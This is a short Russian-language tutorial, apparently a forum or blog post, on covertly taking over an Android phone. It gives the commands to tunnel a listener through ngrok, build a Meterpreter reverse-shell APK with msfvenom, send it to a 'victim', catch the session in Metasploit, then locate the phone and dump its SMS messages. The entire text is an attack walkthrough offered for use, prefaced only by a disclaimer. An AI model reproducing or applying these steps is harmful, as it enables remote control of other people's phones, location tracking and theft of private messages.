Дисклеймер: Мы не несём ответственности за ваши действия! Все манипуляции на ваш страх, и риск Речь пойдёт от ngrok и metasploit, и как можно взломать телефон и захватить управление
Сначала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачиваем сам нгрок.
Затем выкидываем его на рабочий стол и пишем: ngrok-stable-linux-amd64.zip
И пишем Прописываем в терминале ./ngrok tcp 4444
Теперь нам надо уже пойти к создания нашего пейлоада для телефона. Для этого нам поможет msfvenom, для этого мы в новой консоле пишем: msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk Вот сам пейлоад готов, теперь мы должны кинуть его жертве.
Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a". Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux). Чтобы его запустить надо просто написать в консоле msfconsole. И уже там пишем: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit После чего жертва запустит наш пайлоад, и у нас откроется сессия.
Теперь у нас есть доступ к телефону жертвы. Давайте узнаем текущую геолокацию: geolocate
Также можно сделать дамп всех смс, командой: sms_dump
Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним. | |
|
| |
| Просмотров: 294 | |
